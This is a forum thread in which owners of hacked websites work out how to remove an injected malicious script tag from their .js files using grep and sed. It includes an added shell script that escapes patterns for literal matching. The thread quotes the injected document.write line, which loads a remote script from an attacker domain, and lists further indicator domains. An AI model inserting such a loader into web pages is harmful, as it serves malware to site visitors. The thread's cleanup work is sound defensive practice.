My webbox got hacked and in all .js files I want to delete a specific string. The string I want to replace is the following:

document.write('<sc'+'ript type="text/javascript" src="http://addle.diretctrishta.com:8080/Inbox.js"></scri'+'pt>');

I succeeded in getting a complete list of files that contain this string by issuing the following command:

grep -rl "document.write('<sc'+'ript type=\"text/javascript\" src=\"http://addle.diretctrishta.com:8080/Inbox.js\"></scri'+'pt>');" .

Now I want to invoke the sed command for each of the files, but there the system refuses to work because of the regular expression the 's' parameter is expecting. Normally the complete command would be:

grep -rl oldstring . | xargs sed -i -e 's/oldstring/newstring/'

but since there are a lot of non-alphanumeric chars in the "oldstring" the system refuses... any ideas to solve this?
This code removes the last line of every .js file that contains that url. Code:

#!/bin/sh
# Find every .js file under the current directory that mentions the domain.
files=`grep -rl "diretctrishta.com" --include=*.js .`
# Plain sh has no arrays, so iterate over the word-split list (paths without spaces).
for file in $files
do
    # Drop the last line of the file and write the result back over the original.
    sed '$d' "$file" > tmp
    mv tmp "$file"
done
There are many other domains like chargecardsystemsla that need to be removed, but I still didn't discover how the worm got in. I think it was a file from a crack that sniffs ftp passwords.
It was indeed an attack via ftp access... probably sniffed passwords. I used the following commands to clean up the complete htdocs folder recursively. Those were the urls I found on my box... maybe other domains were also used. Via the ftp logs I found out which files were altered and from those I derived the urls. The command looks for files which have the url inside (grep), and then removes the line with this url from that file (sed -i -e /url/d). Hope this can help.

grep -rl "addle.diretctrishta.com:8080" . | xargs sed -i -e /addle.diretctrishta.com:8080/d
grep -rl "d79b570e8c8ae7c1acdea199b5d43e66" . | xargs sed -i -e /d79b570e8c8ae7c1acdea199b5d43e66/d
grep -rl "amble.southamericasolar.com" . | xargs sed -i -e /amble.southamericasolar.com/d
grep -rl "utmost.dawnandjimmy.us" . | xargs sed -i -e /utmost.dawnandjimmy.us/d
grep -rl "c74e3e9a551334df2b26f65cbe9d27b0" . | xargs sed -i -e /c74e3e9a551334df2b26f65cbe9d27b0/d
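The following script is an added example and not code posted by anyone in this thread. It answers the opening question (how to feed a string full of regex metacharacters to sed's s///) and hardens the grep | sed cleanup shown just above: the injected tag is escaped so sed matches it literally, grep is run with -F so the needle is a fixed string rather than a pattern, and a counting helper gives a before/after check. The function names (sed_escape_pattern, sed_escape_replacement, replace_literal, delete_lines_with, count_files_with, make_sample_tree), the sample .js files and the decoy domain "addleXdiretctrishta.com:8080" are all constructed for the demonstration; GNU grep and sed are assumed, as in the commands above (--include, sed -i).

```shell
#!/bin/sh
# Added example for this thread (not code posted by any participant).
# The injected string contains '.', '/', '*'-style regex metacharacters, so it
# cannot be pasted into sed's s/old/new/ unchanged. Escaping it first makes the
# match literal; the same escaping makes the /url/d line deletion exact, so an
# unescaped '.' no longer matches any character.

# Constructed copy of the injected tag quoted in the question.
INJECTED="document.write('<sc'+'ript type=\"text/javascript\" src=\"http://addle.diretctrishta.com:8080/Inbox.js\"></scri'+'pt>');"

# Escape every character that is special in a sed basic regex, plus the '/'
# delimiter, so the result matches the input text literally. '|' is used as the
# delimiter of this inner sed command so '/' can sit inside the bracket list.
sed_escape_pattern() {
    printf '%s' "$1" | sed -e 's|[][\\/.*^$]|\\&|g'
}

# Escape a replacement string: '&' means "the whole match", '\' and '/' are special.
sed_escape_replacement() {
    printf '%s' "$1" | sed -e 's|[\\/&]|\\&|g'
}

# Replace a literal string with another in every .js file under $1 that contains it.
# Usage: replace_literal DIR OLD NEW   (NEW may be empty to delete the string)
replace_literal() {
    dir=$1
    old=$(sed_escape_pattern "$2")
    new=$(sed_escape_replacement "$3")
    # -F: fixed-string search, so grep does not treat the needle as a regex either.
    grep -rlF --include='*.js' -- "$2" "$dir" | while IFS= read -r f; do
        sed -i -e "s/$old/$new/g" "$f"
    done
}

# Delete every line containing the indicator (the /url/d approach used in this
# thread), with the indicator escaped so it is matched literally.
# Usage: delete_lines_with DIR INDICATOR
delete_lines_with() {
    dir=$1
    pat=$(sed_escape_pattern "$2")
    grep -rlF --include='*.js' -- "$2" "$dir" | while IFS= read -r f; do
        sed -i -e "/$pat/d" "$f"
    done
}

# Count .js files under $1 that still contain the literal $2 (0 = cleanup complete).
count_files_with() {
    grep -rlF --include='*.js' -- "$2" "$1" | wc -l | tr -d ' '
}

# Build a small constructed tree of .js files (not data from the poster's box).
make_sample_tree() {
    dir=$1
    mkdir -p "$dir/js/lib"
    printf '%s\n' 'function a(){return 1;}' "$INJECTED" > "$dir/js/app.js"
    printf '%s\n' 'var x = 2;' "var y = 'amble.southamericasolar.com is in a string';" > "$dir/js/lib/util.js"
    printf '%s\n' '// clean file' 'var z = 3;' > "$dir/js/clean.js"
    # Decoy: an unescaped '.' in "addle.diretctrishta.com:8080" would match this too.
    printf '%s\n' 'var decoy = "addleXdiretctrishta.com:8080";' > "$dir/js/decoy.js"
}

# Stand-alone demonstration on a throwaway temporary directory.
demo() {
    tmp=$(mktemp -d)
    make_sample_tree "$tmp"
    echo "before: $(count_files_with "$tmp" "$INJECTED") file(s) carry the injected tag"
    replace_literal "$tmp" "$INJECTED" ""
    delete_lines_with "$tmp" "amble.southamericasolar.com"
    echo "after:  $(count_files_with "$tmp" "$INJECTED") file(s) carry the injected tag"
    echo "decoy untouched: $(count_files_with "$tmp" "addleXdiretctrishta.com:8080") file(s)"
    rm -rf "$tmp"
}
demo
```

Run it on a copy of htdocs first and compare the before/after counts; the original commands above work the same way but with an unescaped pattern, which is fine for domains that contain no other regex metacharacters but would silently also match, for example, "addle-diretctrishta" through the unescaped dot.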
Add 1 to the list of hacked sites. The files were also uploaded via ftp. Just curious, which ftp software were you using? I wonder if the trojan seeks a specific password file... FileZilla for example stores passwords in clear text.
The passwords in TC are in fact obfuscated but not encrypted, and from a trojan's point of view they are as insecure as a clear text file.
Hey, seems I've also been attacked!! Could you direct me a little on exactly where to add the scripts you mentioned to remove the js line? i.e. where to put the commands! Many thanks
You must run those commands in a console. If you don't know what this means, you will do better restoring a full backup of the site. And obviously change the ftp password.